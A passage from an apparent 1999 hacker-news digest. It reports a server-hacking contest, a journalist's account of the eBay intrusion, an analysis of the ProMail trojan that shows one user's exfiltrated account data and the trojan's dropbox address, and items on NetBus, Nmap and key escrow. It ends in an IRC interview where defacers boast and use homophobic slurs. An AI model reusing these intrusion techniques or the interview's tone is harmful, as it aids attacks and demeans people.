sponsoring a contest to draw attention to web server security. They have set up a WindowsNT and a Linux system with a hidden file. First person to get the file wins an IBM Netfinity-server. Try your skillz. PC Intern: http://www.pcintern.de/hacker.htm * Welcome to the Web-Hack! * We wish all participants good luck! * Look for "hack.txt", please! * This is the wayto the Linux-Server: IP: 195.227.43.210 * This is the way to the Windows-NT-Server: IP: 195.227.43.211 Is there optimal protection? The editorial staff of the German computer magazine PC INTERN wants to draw attention to security of data in web-server-systems in an outstanding contest. The hack-event aims at checking and discussing the reliability of Windows-NT- and Linux-PCs' security. Starting at 9.00 am on Thursday 18th, 1999, you will find two links on this site which will lead to the servers to be hacked. On both servers there is hidden a telephone-number and a password. The person who will call first telling the password and the way he or she hacked the server, wins an IBM Netfinity-server. PC INTERN grants the hackers total exemption from punishment - PC INTERN's single aim is to expose and discuss the security's weak spots. On IBM's stage (hall 2, D28) between 1.00 and 2.00 pm, a debate will finish the web-hack-event. Dr. Harald Feldkamp, editor in chief, will discuss about security in the world wide web with the following participants: Dr. Werner Schmidt Ministerialrat beim Bundesbeauftragten für den Datenschutz Wilfried Seiffert Ministerialrat beim niedersächsischen Landesbeauftragten für den Datenschutz Frank Kertscher Principal IT Security für IBM Global Services Klaus Birkenbihl GMD Informationstechnik GmbH Tilmann Müller-Gerbes Leiter Professional Services bei S.u.S.E. Felix Höger Geschäftsführer der NDH Netzwerkdienste Höger @HWA 17.0 eBay owned ~~~~~~~~~~ http://www.ebay.com MagicFX cracks eBay contributed by Code Kid According to MagicFX eBay has been owned for quite some time. To prove this on March 13th he replaced the main web page on one of the servers for a journalist to confirm. The article goes into detail on just how badly eBay is owned. Forbes; http://www.forbes.com/tool/html/99/mar/0319/side1.htm Going once, going twice ... HACKED! By Adam L. Penenberg EBay(nasdaq: EBAY), the hot one-to-one auction site, was hacked on Saturday March 13 by a 22-year old college student who goes by the handle MagicFX. But the story doesn't end there. The hacker maintains access to the site and can return at will. He has "root" access to eBay's computers, the same kind the legitimate administrators enjoy. This means he could change prices or place fake ads, divert traffic to other sites or even take down the entire network. This was starkly illustrated to this reporter on Wednesday night, when the hacker, to prove his point, took down eBay's home page for two minutes and replaced it with the message: Proof by MagicFX that you can't always trust people… not even huge companies. (who woulda known that?) "It's 9:30 PM . . . do you know who has YOUR credit card information?" Although eBay customers don't use credit cards to pay for merchandise--the site acts as a middleman--sellers use them to pay the company service fees. When contacted, the company refused to comment, saying that unnamed law enforcement officials had requested that eBay remain silent about issues surrounding hacking. Initially, the hacker, who would not divulge his real name, gained access to eBay's computers on Saturday afternoon by figuring out what accounts existed, then trying simple passwords. Since eBay is an e-commerce site, MagicFX tried words like "commerce," "trading" and "eBay," until he cracked one, although he would not divulge the password he used. He says he was surprised eBay's technicians didn't use standard password protecting schemes, which would have meant a mixture of numbers and letters. Once inside, MagicFX employed a technique referred to as a "local root buffer overflow." He ran a script that transmits too much information into a targeted zone. The data that can't fit is then manipulated so that he was able to trick the computer into running his commands at an elevated privilege. "I exploited a buffer overflow condition, which existed in an SUID root program," says the hacker, who is finishing up a B.S. in computer science. "Then I used software which I had written myself to get to the rest of the network. FreeBSD was the first machine I accessed, the rest were Solaris." From there, MagicFX modified the system's software so that instead of providing administrators with a secure way to work from a remote machine, it logged that information to a hidden file, so that not only could he intercept passwords and log in names, but actually watch everyone's keystrokes. "After gaining access to more of the network, I tried to figure out how the service worked. Most of the web servers run on Windows machines, which use the SMB protocol to load a template page off a specified machine and dynamically create the HTML." For Saturday's hack, MagicFX left his page up for about 45 minutes; he claims it was viewed by about 4,000 site visitors. (Hackers often attack on weekend evenings, because most system administrators are out of the office.) The reason more people didn't witness the hack is that eBay deploys several web servers and balances the load based on the amount of traffic. Since MagicFX exploited only one machine for the web page hack, only users served by that machine could view the hacked page. But he claims the company must know about the hack, since he monitored E-mails from users alerting the company. He pulled his own page down and logged off when he spotted a system administrator--"to be nice." Mirrors--or copies--of both Saturday's and Wednesday's hacked eBay pages have been archived by Brian Martin, a computer security consultant, on his site attrition.org (http://www.attrition.org/mirror/attrition/ebay.com) What does MagicFX say about eBay's security? "I think they have better security than NASA, but that's not saying much." Martin, who also witnessed the Wednesday night eBay hack, says, "Large systems like eBay are focused on keeping the money machine running smoothly, but this has come at the expense of security. Users should realize that just because a site says their personal information and credit card numbers are secure doesn't necessarily make it so." MagicFX says he hacked eBay, which has a market cap of more than $18 billion, because he wanted to see how a large e-commerce site worked from the inside. Once there, he discovered an added bonus: eBay uses a proprietary system to do its trading, he says, and the source code is highly prized in the hacker world. As a result, a number of hackers have approached him for a copy, but he has not complied,, since he hasn't had a chance to sift through it yet. This was not the first hack for MagicFX. Recently he also defaced web sites promoting the movies Varsity Blues and 200 Cigarettes, "because they got a lot of hits and I didn't like the movies really." He also hit monicalewinsky.com because it is "anti-Clinton" and "ourfirsttime," a site that claimed it would webcast a man and woman losing their virginity. MagicFX says he hacked the site to get the word out it was a media hoax. "I have learned at least as much by hacking as I have in school," he says. External link: attrition.org @HWA 18.0 Aussies to ban Net pr0n ~~~~~~~~~~~~~~~~~~~~~~~~ From The Australian http://technology.news.com.au/techno/4317712.htm Alston's regime to ban Net nasties By WAYNE ADAMS and DAN TEBBUTT 20mar99 COMMUNICATIONS and Information Technology Minister Richard Alston has unveiled a regime that will effectively ban X-rated and Refused Classification material from the Internet. "There's no doubt the Internet provides enormous educational and informational opportunities but, at the same time, it does pose considerable risks for the community," he said yesterday. "We are therefore proposing to introduce a new regime that will hopefully ensure, certainly for Internet sites hosted within Australia, that we block access to material that is either illegal, Refused Classification or X-rated and, in relation to R-rated material, is only available to those over 18 years of age." The Australian Broadcasting Authority will oversee the regime. Community and Internet industry groups will be included under the proposals. They will provide a "hotline" on offensive material and pass information to the ABA, monitor online sites, advise on complaints mechanisms and provide community education. If the ABA thinks content is serious enough, it will be able to prevent access to the material pending a National Classification Board opinion. The authority will have to issue a notice to a service provider to halt access to any content deemed to be proscribed content. Senator Alston rejected suggestions that the announcement was related to the Telstra sale or appeasing Independent senator and morals campaigner Brian Harradine. "Senator Harradine is probably the most visible public manifestation of concern, but the fact is that there are many hundreds of thousands of people in Australia who would have the greatest concern if they thought that under-age children could have access to illegal or highly offensive material," he said. However, Labor's communications spokesman, Stephen Smith, said Senator Harradine and parents "should not be duped". "The announcement today is about Australian content, and it's a very small proportion of Internet content which is locally produced and locally put online," he said. Kimberley Heitman, chairman of Internet advocacy group Electronic Frontiers Australia, said: "This is as bad as it gets – they have ignored everything the Internet industry has said. None of these things will affect end users. It will just drive content offshore." @HWA 19.0 More on the Promail email trojan ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Originally reported in the last issue, here's more info from packetstorm on the Promail email trojan program. Date: Fri, 19 Mar 1999 09:41:18 +0100 From: Aeon Labs To: packetstorm@genocide2600.com Subject: security/privacy news (Perhaps this might be of interest to Your readers.) ProMail v1.21, an advanced freeware mail program spread through several worldwide distribution networks (SimTel.net, Shareware.com and others), is a trojan. Upon discovering - through LAN sniffing - that the program would attempt to connect to SMTP instead of POP3 when a regular mail check was performed, we reverse-engineered the software. ALL of the personal user data, including the user's password in encrypted format, is sent to an account on NetAddress - a free email provider - as soon as a valid internet connection is detected. Apart from this "feature", the software is 100 % functional and very well done. Well, it seems that 1999 is the worst year for privacy... More detailed information can be found on our web site at http://cool.icestorm.net/aeon/news.html --------------------------------------------------------------------- Aeon Labs http://cool.icestorm.net/aeon [http://cool.icestorm.net/aeon/news.html] 03.99] ProMail v1.21, an advanced freeware mail program for Windows 95/98, is a trojan. It has been spread through several worldwide distribution networks (SimTel.net, Shareware.com and others) as proml121.zip. Upon discovering - through LAN sniffing - that the program would attempt to connect to SMTP instead of POP3 when a regular mail check was performed, we reverse-engineered the software. The executable, which appears to have been created with Borland Delphi, has been packed with Petite (a shareware Win32-EXE compressor) and then "hexed" to make disassembly harder. ProMail v1.21 supports multiple mailboxes; every time a new mailbox is created, an "ini" file containing the users full name, passwords, email addresses, servers and more is generated. Prior to doing any other action, the program performs a check for a valid network connection which, if found, allows for the sending of ALL of the personal user data, including the user's password in encrypted format, to an account on NetAddress - a free email provider. Apart from this "feature", the software is 100 % functional and very well done. For further information or a more detailed analysis contact us. --------------------------------------------------------------------------------- Date: Sat, 20 Mar 1999 03:51:00 -0500 (EST) From: aeon@army.net To: packetstorm@genocide2600.com Subject: Re: your mail currently our members have disassembled and analyzed the whole executable. the only thing it appears to do as a trojan is to send the accounts data entered by the user: full name, organization, email address, user name, password (encrypted), smtp and pop3 servers, etc. and since promail supports multiple accounts, each newly created account is sent. the data for each account is contained in a text file which is used to initialize promail at run-time. the same text file is used as body of the email which is sent to the author (supposedly) of the program. it appears that all emails are sent with same subject line: "kirio". the program also creates the file promail.pml in its directory. it's a zero length file used as permanent flag to "remember" to the trojan that one or more accounts data could not be sent in the last session (for example, when accounts are created off-line, or when not followed by a mail check in the same session). we also managed to crack the mailbox to which accounts data is sent. about ~80 emails (== accounts) were found and another dozen was received after only ten minutes or so. accounts for microsoft, michigan us army, old bridge chemicals and a videogames company - amongst the others - were found. we have merely informed a _contact_ (not the ml) in ntbugtraq and several "underground" news/security sites. well you can contact the various *traq mailing lists if you want. we don't care if people still trust anything that can be downloaded from the net anyway. i guess we're not exactly "white hat" hackers :P if you need any help or further analysis on a specific part of the program please feel free to contact us. ------------------------------------------------------------------------ Aeon Labs http://cool.icestorm.net/aeon --------------------------------------------------------------------------------- Date: Sun, 21 Mar 1999 09:40:26 +0100 From: Patrick Oonk To: tattooman@ADRIC.GENOCIDE2600.COM Subject: [patrick@pine.nl: ProMail trojan proof] ----- Forwarded message from Patrick Oonk ----- Hi, I've tested the ProMail Trojan, it sends the info to naggamanteh@usa.net using the smtp server you supply when creating an account. I'll Cc: abuse@usa.net and bugs@shareware.com ProMail can still be downloaded at many sites, just check http://search.shareware.com/code/engine/File?archive=sim-win95&file=email%2fproml121%2ezip&size=409141 These are the queue files at my smtp server after I installed ProMail and created an account: $ more /var/spool/mqueue/qfPAA17183 V2 T921939650 K921939657 N1 P30435 I6/0/88205 M... reply: read error from office.pine.nl. Fb $rSMTP $sfoo $_foo.domain.com [10.0.0.1] S RPFD: H?P?Return-Path: HReceived: from foo (foo.domain.com [10.0.0.1]) by bar.domain.com (8.9.1/8.9.1) with SMTP id PAA17183 for ; Sat, 20 Mar 1999 15:20:50 +0100 (MET) H?D?Date: Sat, 20 Mar 1999 15:20:50 +0100 (MET) H?F?From: patrick@pine.nl H?M?Message-Id: <199903201420.PAA17183@bar.domain.com> HTo: naggamanteh@usa.net HSubject: kirio $ more /var/spool/mqueue/dfPAA17183 Name=New Account [From] EMail=patrick@pine.nl Name=Patrick Oonk Organization=Pine Internet B.V. [ReplyTo] EMail=patrick@pine.nl Name=Patrick Oonk [POP3] Server=pop.domain.com Port=110 User=patrick Password=1hFATUIxWOkJ3b3N3chBXZrFmZMUE PromptPassword=0 DoPOP=1 StandardDownload=0 [SMTP] Server=smtp.domain.com Port=25 DoSMTP=1 [Filter] Keep= Delete= -- : Patrick Oonk - http://patrick.mypage.org/ - patrick@pine.nl : : Pine Internet B.V. Consultancy, installatie en beheer : : Tel: +31-70-3111010 - Fax: +31-70-3111011 - http://www.pine.nl/ : : -- Pine Security Digest - http://security.pine.nl/ (Dutch) ---- : : "unix is voor types zonder sociaal leven..." - Patrick van Eijk : ----- End forwarded message ----- -- : Patrick Oonk - http://patrick.mypage.org/ - patrick@pine.nl : : Pine Internet B.V. Consultancy, installatie en beheer : : Tel: +31-70-3111010 - Fax: +31-70-3111011 - http://www.pine.nl/ : : -- Pine Security Digest - http://security.pine.nl/ (Dutch) ---- : : "unix is voor types zonder sociaal leven..." - Patrick van Eijk : : A signature starts with "-- ". : --------------------------------------------------------------------------------- Date: Mon, 22 Mar 1999 18:20:50 +0900 (JST) From: Aeon Labs To: packetstorm@genocide2600.com Subject: ProMAIL users So far we have collected hundreds of email *addresses* from naggamanteh@usa.net (only the headers were retrieved, we don't want their passwords/personal data/etc). With these addresses, users of ProMail could be warned about the problem with their passwords. If you can find people who are willing to do the work, we'll send you a list of the addresses we have collected. ----------------------------------------------------------------------------- Aeon Labs http://cool.icestorm.net/aeon 20.0 C41 - Pentagon’s cyberdefenses criticized ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Pentagon’s cyberdefenses criticized Report: Threats aren’t taken seriously enough by HQ, troops MSNBC STAFF AND WIRE REPORTS WASHINGTON, March 22 The military’s key communications infrastructure is dangerously vulnerable to attacks from cyberspace and requires urgent changes, according to a new study ordered by Congress and sponsored by the Pentagon. One avenue the Pentagon was advised to consider was a change in policy that would allow it to counter -attack when a cyberattacker strikes. THE COMMAND, Control, Communications, Computers and Intelligence systems - known as C4I - is compromised by security problems and also by a military culture prone to treating such problems as a lesser priority, a National Research Council committee reported."The rate at which information systems are being relied on outstrips the rate at which they are being protected," it said. "The time needed to develop and deploy effective defenses in cyberspace is much longer than the time required to develop and mount an attack." It also suggested the Pentagon consider whether "counter-attack is an appropriate response to a cyber attack." As U.S. policy now stands, the Pentagon may not go after cyber attackers, instead handing off investigations to civilian law enforcement agencies. Despite evidence of security lapses in C4I - which handles communications and warning tasks along the chain of command - the Pentagon's "words regarding the importance of information systems security have not been matched by comparable action," the report said. MANAGEMENT CRITICIZED "Troops in the field did not appear to take the protection of their C4I systems nearly as seriously as they do other aspects of defense," said the report, which Congress ordered the Pentagon to commission in 1995. The council is an independent organization chartered by Congress to advise the government. The committee said it observed one military field exercise in which personnel in an operations center mistakenly took as a joke a cyber attack on their systems. The report indicated the problems were due more to the Pentagon 's management of the systems than to the technology itself. It cited C4I workers' lack of stature compared with traditional combat forces, compatibility problems between the services and a need for more budget flexibility on the matter from both the Defense Department and Congress. PENTAGON'S RESPONSE In a statement, the Pentagon acknowledged that the military's strength "is our information technology," and that "our dependence on such assets, which may be subject to malicious attack, makes information technology our weakness as well." It said that as the council's report was being prepared, the Defense Department had already improved protection against computer attack by implementing new programs, establishing a joint task force for computer defense and expanding training of its information technology personnel. But Kenneth Allard, an analyst who has written about C4I, said its weaknesses are in part the fault of "Industrial Age" military acquisition policies - applying to computers as well as tanks, ships and aircraft - that give the services their own procurement duties. Ships and tanks may perform different tasks, he said, but the Army, Navy and other services need a single-standard computer system. "Twenty-first century combat is the war of the databases, in which information flows must go from the foxhole to the White House and back down again," said Allard, a former Army colonel and analyst at the Center for Strategic and International Studies who had not yet read the council's report. RECOMMENDATIONS The report recommended:making C4I a greater budget priority in defense spending, with a flexibility that can "exploit unanticipated advances in C4I technology." Designating an organization responsible for providing direct defensive operational support to commanders. o Funding a program to conduct frequent, unannounced penetration testing of C4I systems. o Ensuring that programs are operable even if one part has been penetrated by an adversary. o Emphasizing the importance of information technology in the military leadership. o Establishing an Institute for Military Information Technology, possibly as part of an existing body. An archive audio copy of the Senate hearing is available via the FedNet service at www.fednet.net/h0322b.htm. MSNBC’s Miguel Llanos and The Associated Press contributed to this report. @HWA 21.0 [ISN] NetBus 'Trojan' Splits Security Community ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ NetBus 'Trojan' Splits Security Community (03/02/99, 7:46 p.m. ET) By Lee Kimber, Network Week Internet-connected networks could be left vulnerable to Trojan attacks because leading anti-virus software vendors have said they won't scan and disable a new, more powerful NetBus Trojan. Remote-control programs like NetBus were dubbed Trojans because they could be hidden on computers by crackers. The latest version of NetBus has split network-security experts because its author said it was not a Trojan as it remained visible. But crackers reportedly rewrote it to make it invisible within days of its launch. Data Fellows and Sophos said their anti-virus products would not disable the recently launched remote-control Trojan NetBus 2 Pro because its Swedish author Carl-Fredrik Neikter was a professional who now charged $12 for a legitimate shareware product. "NetBus 2.0 Pro is not detected as it is now commercial software," according to a spokesman for Data Fellows' European office in Finland. "NetBus 1.x up to 1.7 was detected by anti-virus scanner F-Secure but not NetBus 2.0" Data Fellows' website reported that earlier NetBus versions were used frequently to steal data and delete files on people's machines. NetBus lets crackers to take remote control of networked PCs, but publicity over its spread has been eclipsed by the Back Orifice remote-control Trojan written by hacker group Cult of the Dead Cow. But unlike Back Orifice, NetBus can infect Windows NT machines and is more easily configured. And Neikter described it himself as a "remote administration and spy tool." His promotional material also mentioned NetBus provided the ability to change files and registries. Neikter could not be contacted for comment. Sophos confirmed it also would not offer NetBus support. "It is a commercial product and it looks extremely professionally written. You can use these products for lawful or unlawful purposes," said Jan Hruska, Sophos technical director. He added Sophos products did not scan for earlier versions of NetBus but the company would make a scanning tool available that people could use if they want to. But rival vendor Network Associates said it believed NetBus was aimed at young crackers and joined with other vendors to commit to detecting and removing the Trojan in Dr Solomon's and McAfee anti-virus products. "We're carrying on detecting it," said the company's anti-virus consultant Jack Clark. "We don't believe a commercial application would have a section in the manual that says 'have fun with your friends' and has the ability to pop out the CD tray on users' machines," he added. And asked if Symantec would update its software to detect the Trojan, Symantec technical manager Kevin Street replied: "Absolutely. We've already got it sorted out, so why would we remove it?" -o- Subscribe: mail majordomo@repsec.com with "subscribe isn". Today's ISN Sponsor: Internet Security Institute [www.isi-sec.com] @HWA 22.0 [ISN] Cracking tools get smarter ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Forwarded From: William Knowles http://www.wired.com/news/print_version/technology/story/18219.html?wnpg=all [Wired.com] (3.3.99) With awe and alarm, security analysts have observed the capabilities of Nmap, a network-scanning program that crackers are now using to plot increasingly cunning attacks. "Just before Christmas, we detected a new [network] scanning pattern we'd never seen before," said John Green, a security expert on the "Shadow" intrusion-detection team at the US Navy's Naval Surface Warfare Center. "Other sites have seen the same activity. The problem was, no one knew what was causing it." Green made the remarks Tuesday in an online briefing hosted by the SANS Institute, a nonprofit network-security research and education organization. The group held the briefing to alert network administrators of the alarming increase in the strategies of network attacks. The culprit software prowling outside the doors of networks participating in the study is Nmap, an existing software utility used by administrators to analyze networks. In the hands of intruders, security analysts discovered, Nmap is a potent tool for sniffing out holes and network services that are ripe for attack. The analysts didn't look for actual damage that was carried out. Instead, they silently watched as various networks were scanned by untraceable Nmap users. "The intelligence that can be garnered using Nmap is extensive," Green said. "Everything that the wily hacker needs to know about your system is there." Rather than feel in the dark to penetrate network "ports" at random, Nmap allows intruders to perform much more precise assaults. The implications are a bit unnerving for the network community. The tool makes planning network intrusions more effective, while simultaneously bringing this sophistication to a wider audience of hackers. "It takes a lot of the brute force out of hacking," said Green. "It allows [intruders] to map hosts and target systems that might be vulnerable." And that should result in a higher success rate for attempted intrusions. "I think we're going to see more coordinated attacks. You can slowly map an entire network, while not setting off your detection system," said software developer H. D. Moore, who debriefed network analysts at the conference. But Moore is part of the solution. He authored Nlog, software that automatically logs activity at a network's ports and parlays it to a database. Weekly checks of the database enable the user to tell if someone is performing an Nmap analysis. Nlog serves as a companion tool to Nmap. Just like intruders, administrators can use Nmap to detect their own network weaknesses, then plug the holes. Prevention is the only defense, Green and Moore said. There is no other known way to combat an Nmap-planned network attack. "Right now it's basically a suffer-along scenario," Green said. But, at least, Nmap lets administrators "know what the hackers know about you." -o- Subscribe: mail majordomo@repsec.com with "subscribe isn". Today's ISN Sponsor: Internet Security Institute [www.isi-sec.com] @HWA 23.0 [ISN] British Defense Ministry Dismisses Hacker Report ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From the ISN list; Forwarded From: jei@zor.hut.fi http://nt.excite.com/news/r/990303/12/tech-hackers British Defense Ministry Dismisses Hacker Report (Last updated 12:21 PM ET March 3) LONDON (Reuters) - Britain's Defense Ministry Wednesday dismissed as "not true" a newspaper report that said hackers had seized control of one of its military communications satellites and issued blackmail threats. The Sunday Business newspaper had said the intruders altered the course of one of Britain's four satellites used by defense planners and military forces around the world. "There is no basis to the story whatsoever," said a Defense Ministry spokesman. "It's not true." Security sources cited by the newspaper said the satellite's course was changed just over two weeks ago. The hackers then issued a blackmail threat, demanding money to stop interfering with the satellite. A police spokesman said the story was for the Defense Ministry to investigate. "Military security is a matter for the Defense Ministry," he said. -o- Subscribe: mail majordomo@repsec.com with "subscribe isn". Today's ISN Sponsor: Internet Security Institute [www.isi-sec.com] @HWA 24.0 [ISN] Encryption key would lock up criminals ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Forwarded From: Fearghas McKay Originally From: Yaman Akdeniz http://news.bbc.co.uk/hi/english/sci/tech/newsid_289000/289139.stm Tuesday, March 2, 1999 Published at 17:18 GMT Encryption key would lock up criminals Dr Ross Anderson: "Big business can look after itself." By Internet Correspondent Chris Nuttall Cyber-criminals would be caught if the government introduced a system where the keys to coded e-mail were voluntarily lodged with licensed authorities, according to the UK National Criminal Intelligence Service (NCIS). NCIS was one of the groups appearing before the House of Commons on Tuesday. "Criminals are lazy, greedy and they make mistakes," John Abbott, NCIS Director General told the Trade and Industry Select Committee, which is hearing witnesses on electronic commerce issues. "We are able to capitalise on this and we anticipate that a licensing scheme would allow us to have some successes," said Mr Abbott. Civil liberties campaign Civil liberties groups are campaigning against "key escrow" - the term used for lodging codes with a third party. They do not want it included in a forthcoming Electronic Commerce Bill. A long-awaited consultation paper on the bill from the Department of Trade and Industry (DTI) is expected in the next few days. Opponents argue the proposed voluntary licensing system where Trusted Third Parties (TTPs) would hold the keys to encrypted data being sent over the Internet would never be used by criminals. But an NCIS spokesman, who declined to be identified, told the hearing that just as criminals used telephones at every level for their activities, so some would use the TTPs. "We would prefer to have a mandatory licensing system because that would be more inclusive," said Mr Abbott. "I do recognise that we are moving into new territory, and this would not be a complete answer, and if all that is on offer is a voluntary scheme then that is better than no scheme at all." Real time access The Chief Investigations Officer of HM Customs & Excise, Richard Kellaway, told the hearing that real-time access was needed to encrypted data. Mr Abbott added that it was no use knowing three days afterwards where a consignment of drugs had been exchanged. He admitted that key escrow would not solve the problem of crimes being committed on an international scale over the Internet. "But I would urge the government to lead. Law enforcement agencies throughout the world are extremely concerned with developments. We anticipate the problem will grow over time and certainly the G8 law enforcement forum are constantly discussing this and looking for ways forward." Business concerns Businesses, as well as civil liberties campaigners, have voiced concern at the possible proposals on key escrow, and the Post Office stated its opposition at the hearing. Jerry Cope, its managing director for strategy, said there were two areas of concern: "If people feel this system makes them less secure then they will not want to use it. We need to instil confidence. "Then there is the additional cost of regulation and if it is greater than in France or Ireland then business will go elsewhere. It is as easy to send e- mail from London to Manchester via Paris as it is direct from London to Manchester." Mr Cope said there had been a lack of dialogue between business and law enforcement agencies and he suggested a possible compromise. Agencies would bear the additional costs of being able to extract information from TTPs and would only exercise their powers when there was a threat to national security. The Post Office will announce later this month that it is launching a Trusted Third Party service called ViaCode. Red flag The final witness of the day, a leading encryption expert, Dr Ross Anderson of Cambridge University, compared key escrow to the red flag that had to be waved in front of the first motor cars to warn people of danger. A week after the requirement was removed, there was the first road traffic fatality. But no-one would suggest we go back to the red flag today and the assumption is made by the police that 99% of those on the road are good guys, he said. He added that the police had a long way to go with computers to match their current knowledge of the motor car. They had often had to call in outsiders such as himself to help with encryption cases. "There are many, many ways of attacking computer systems and inevitably TTPs are going to be compromised," he said. "The role of government should be protecting the consumer - big business can look after itself." He said the best way forward in terms of legislation was the Australian approach that simply recognised that electronic signatures had the same force as manuscript signatures. "Key escrow would have to be global to achieve its stated purpose, and there is now no prospect of this," he said in an additional written submission to the committee. -o- Subscribe: mail majordomo@repsec.com with "subscribe isn". Today's ISN Sponsor: Internet Security Institute [www.isi-sec.com] @HWA 25.0 [ISN] Crypto: Under lock and key ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Forwarded From: privacy http://www.newscientist.com/ns/19990306/forum.html Under lock and key By Duncan Graham-Rowe GOVERNMENTS hate things going on that they don't know about. Not long ago, many governments insisted that they should have the ability--and the right--to decipher all coded messages. The US government, for example, tried to get organisations to use its clipper chip for encryption. Only the government, of course, would hold the numbers, or keys, that would enable it to read anything encoded by the chip. Encryption looked set to become a major civil liberty issue. The subject might seem somewhat esoteric. Indeed, many people have never even heard of it. But whether you know it or not, you almost certainly depend on computer encryption already. Banks, for example, use encryption software to safeguard their customers' personal identification numbers, or PINs. Many other businesses, and individuals, also have good reasons for wanting to be sure that information such as a credit card number sent over the Internet is not being intercepted--or at least cannot be read if it is. Human rights organisations, for example, often use cryptography to relay sensitive information. People who send coded messages obviously want to use strong encryption software, the best available. And while there is no such thing as an uncrackable code, strong encryption comes pretty close. Even with the fastest supercomputers, it could take years to break most properly encoded messages. And this is what gets governments so worried. Strong encryption makes eavesdropping on other people's communications practically impossible. Many governments argue that being able to decode encrypted messages is essential if they are to crack down on criminal activity, such as the distribution of child pornography on the Internet. As a result, a number of Western governments, including France, Britain and the US, have spent years quietly trying to introduce various versions of what is called key escrow. The idea is that government approved agencies, called "trusted third parties", would be set up to hold the encryption keys on our behalf. Then, when the police want to decode a particular message or set of communications, they would present a warrant to these agencies. It sounds reasonable, but such a system would be open to abuse and far from secure. Besides favouring encryption systems that are easy to crack, key escrow represents a weak link in what would otherwise be an almost impenetrable chain. Worse still, it wouldn't even achieve what it was designed for. If key escrow was in place, few criminals would be stupid enough to use it. In fact, criminals would probably be the only ones with any real privacy. And while all those whose job it is to fight crime argue that this would nevertheless provide a good way of flushing out criminals, to do this effectively you would have to know where to look in the first place, which is a somewhat circular argument. So is it really worth jeopardising our privacy on the off chance that the police might catch a few careless criminals? Not according to the French. Last month, France denounced its own well-established policy of banning commercial encryption, after 200 companies complained to the government about key escrow. Prime Minister Lionel Jospin openly admitted that key escrow was useless in fighting crime and therefore unwarranted. And even the US seems to be backing down, after a spate of TV commercials aimed at embarrassing the government brought the issue out in the open. It also seems likely that export laws will be relaxed so that strong encryption software such as Pretty Good Privacy (PGP) is no longer classified as munitions and banned from export. Britain's Department of Trade and Industry seems to be following suit. After nearly five years of consultation, the e-commerce bill is rumoured to be published this week. Although the official line has been that the government favours key escrow, euphemistically calling it a voluntary system of cryptography, the message that this is unacceptable appears to have been drummed home not just by industry bodies but also, according to popular rumour, by the former trade minister Peter Mandelson. This is a welcome change of heart. It is just a pity that it has come not from governments recognising the futility of key escrow or from listening to the cogent arguments of civil libertarians, but merely in response to pressure from industry. From New Scientist, 6 March 1999 -o- Subscribe: mail majordomo@repsec.com with "subscribe isn". Today's ISN Sponsor: Internet Security Institute [www.isi-sec.com] @HWA 26.0 HRC's interview with Goat Security (IRC LOG) ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ HRC is a new site (Hackers Resource Centre) that has premiered with the following "article" on Goat Security, the team that recently hacked Yahoo.. well a new group is out. its title: Goat Security. they are on #feed-the-goats on efnet. you may visit their page at goat.sphix.com. responsible for the Yahoo.com hack which is archived at hackernews.com this group is goin big and gettins some fame. They poke fun of Ez00ns, and B0rt. claiming they are interviewing them, and talking bout how they have anal sex among other queer things. and yes im even mentioned in the interviews. portrayed as a pedophiliac, and a homosexual. i do find this page extremely funny. it makes me laugh out loud!. the group consists of members from HcV, and Legion2000. theres a few others that dont belong to a group. the complete roster is on their homepage. for the full interview direct your attention here.(see below) on march 18th they also got des-con-systems.com as far as i know there isnt a archive of this hack. ech0 owned them again on March 21st. with mad elite props to goat security. well i wonder how long this group will go on. b0w to the goat. From HRC http://solarz.net/hrc/interviewedgoats.html Session Start: Sun Mar 21 22:09:24 1999 * Logging #goating to '#goating_990321.log' [Debris] one min [^Dreamer] k ööö [join(#goating)] chemmy (lamur@modemcable207.162.mmtl.videotron.net) ööö [mode(#goating)] Debris (+o chemmy) [chemmy] Dont you hate when you overwrite a window [Debris] lol [Debris] hold on [^Dreamer] k [Debris] Ok lets get started [^Dreamer] k [chemmy] I cant figure out MY FUCKING ERROR [Debris] chem [Debris] this is an interview [^Dreamer] 1) why was feed-the-goats founded? to annoy ppl? to inform ppl of ez00s? [^Dreamer] ez00ns rather [chemmy] Ha [chemmy] ^Dreamer, Because Debris had no life.. [Debris] Well basically me and ech0 started it in one boring day [Debris] hold on more coming [Debris] we were talking and ech0 told me how he sometimes makes a chan called #feed-the-goats [Debris] so, me and ech0 went there and asked chem if we could use one of his eggdrops and of course he said no at first [Debris] but then he changed his mind [^Dreamer] whyd you change your mind chem? [Debris] And ech0 got hcv people coming and stuff, and i thought if i turn this into a group i can be cool so here we are [chemmy] Cuz debby was my friend :> [Debris] =] [chemmy] And I mean I had lotsa so why not put one in a gay unpopular friend [chemmy] friend-chan [^Dreamer] ok so then the groups as most ppl know naturally hate/dislike/whatever ez00ns and b0rt and myself. so the group just kinda turned to pokin fun and makin fake interviews [^Dreamer] ? [Debris] me and ech0 seem to dislike everyone but ourselves and our friends [Debris] And we enjoy pissing off the world [Debris] and [Debris] well we think LoU is gay, and ez00ns is too [Debris] so why not tell everyone else [^Dreamer] understandable [chemmy] hehe [Debris] were just letting out our creative genius [^Dreamer] who drew the damn goat pics on the intro to the goat page? [Debris] um [Debris] heh [Debris] uh, we um..... found thaty [^Dreamer] i like em [Debris] actually it was me [^Dreamer] do you have plans of like world domination? cyber wars? killing anything? or just having some fun? [^Dreamer] i know this interview sucks dick, but youll have to forgive me for ive never interviewed anyone before [chemmy] What is this interview for? [Debris] Well our plans at this time are, to dominate the blowing up of toilets scene, and take out the cDc forever! [^Dreamer] so you hate the cDc (Cult of the Dead Cow???) [Debris] yes [Debris] they always ban me, all i wanted was some damn JUAREZ [^Dreamer] well i started a page called H.R.C. (solarz.net/hrc) and i plan on putting this up there as my first article.. [chemmy] ha ok [^Dreamer] was FtG responsible for the yahoo hack? [Debris] whos ftg? [chemmy] Just remember, Debris is crazy [chemmy] Ftg? [^Dreamer] Feed-the-Goats [Debris] We are goat security [^Dreamer] ok goat security (Gs ok?) [chemmy] So therefore yes [Debris] Yes, the yahoo hack, although denied by 